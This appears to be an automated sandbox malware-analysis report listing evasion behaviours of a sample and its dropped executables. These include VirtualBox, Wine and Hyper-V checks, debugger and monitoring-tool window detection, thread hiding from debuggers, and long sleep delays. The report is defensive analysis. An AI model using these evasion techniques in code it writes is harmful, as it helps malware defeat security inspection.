                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Source: Macromedia.com, 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 2C60000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 2D90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: 4D90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 1960000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 3280000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory allocated: 5280000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11E0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C60000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A10000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 32E0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3470000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5470000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXECode function: 11_2_053002EA rdtsc 11_2_053002EA
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeCode function: 15_3_00B9BD5A sldt word ptr [eax+00000070h]15_3_00B9BD5A
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread delayed: delay time: 600000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread delayed: delay time: 600000
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9912Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9958Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 461Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 4871Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 3431Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9950
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeAPI coverage: 3.4 %
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2808Thread sleep count: 35 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2808Thread sleep time: -70035s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3604Thread sleep count: 32 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3604Thread sleep time: -64032s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep count: 54 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep time: -108054s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6312Thread sleep count: 461 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6312Thread sleep time: -13830000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916Thread sleep count: 45 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5916Thread sleep time: -90045s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep count: 48 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208Thread sleep time: -96048s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2844Thread sleep count: 38 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2844Thread sleep time: -76038s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep count: 64 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep time: -128064s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep count: 4871 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1520Thread sleep time: -9746871s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep count: 3431 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5932Thread sleep time: -6865431s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe TID: 5248Thread sleep time: -34017s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe TID: 4696Thread sleep time: -210000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 167 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 170 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 156 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 176 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 166 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 235 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 297 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 67 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 224 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 31 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 137 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep count: 135 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe TID: 4400Thread sleep time: -600000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 1196Thread sleep count: 69 > 30
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com TID: 5168Thread sleep count: 69 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe TID: 4220Thread sleep time: -120000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe TID: 7872Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe TID: 6572Thread sleep time: -60000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe TID: 6572Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4752Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1396Thread sleep count: 9950 > 30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 159 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 161 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 192 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 265 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 276 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 173 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 272 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 177 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 179 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 136 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep count: 33 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe TID: 4856Thread sleep time: -600000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeFile opened: PHYSICALDRIVE0
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: unknown FullSizeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: unknown FullSizeInformation
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009CDBBE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099C2A2 FindFirstFileExW,0_2_0099C2A2
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D68EE FindFirstFileW,FindClose,0_2_009D68EE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009D698F
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD076
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009CD3A9
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D9642
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D979D
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009D9B2B
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009D5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009D5C97
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread delayed: delay time: 600000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread delayed: delay time: 600000
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\764661
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: skotes.exe, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmp, 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmp, c7f37422c5.exe, 00000032.00000002.22773560606.00000000005F6000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: f891ed3167.exe, 00000026.00000002.22707606708.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@TA
                                Source: MSBuild.exe, 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                                Source: powershell.exe, 00000006.00000002.22121335248.00000000072A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000E.00000002.23301420244.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22307013969.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22319632165.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22450108734.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22391403036.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447151682.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22405813701.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22449084177.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22377181188.0000000000B1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: f891ed3167.exe, 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE, 0000000B.00000002.22146066632.000000000061B000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000C.00000002.22160600103.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000000D.00000002.22161270732.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmp, 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmp, c7f37422c5.exe, 00000032.00000002.22773560606.00000000005F6000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: c7f37422c5.exe, 00000032.00000002.22782484932.00000000053C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8
                                Source: skotes.exe, 0000000E.00000002.23301420244.0000000001036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                                Source: Macromedia.com, 0000001D.00000002.22806442878.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000001D.00000003.22792686507.0000000001C4A000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22808633872.000000000137A000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22799902757.0000000001371000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000002.22811887854.000000000137C000.00000004.00000020.00020000.00000000.sdmp, AchillesGuard.com, 00000022.00000003.22739302143.0000000001371000.00000004.00000020.00020000.00000000.sdmp, 33c3d7c7bd.exe, 00000023.00000002.22880957255.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000030.00000002.23328722725.0000000005110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXESystem information queried: ModuleInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: CodeIntegrityInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: CodeIntegrityInformation
                                Hides threads from debuggers
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeThread information set: HideFromDebugger
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeFile opened: SIWVID
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXECode function: 11_2_053002EA rdtsc 11_2_053002EA
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009DEAA2 BlockInput,0_2_009DEAA2
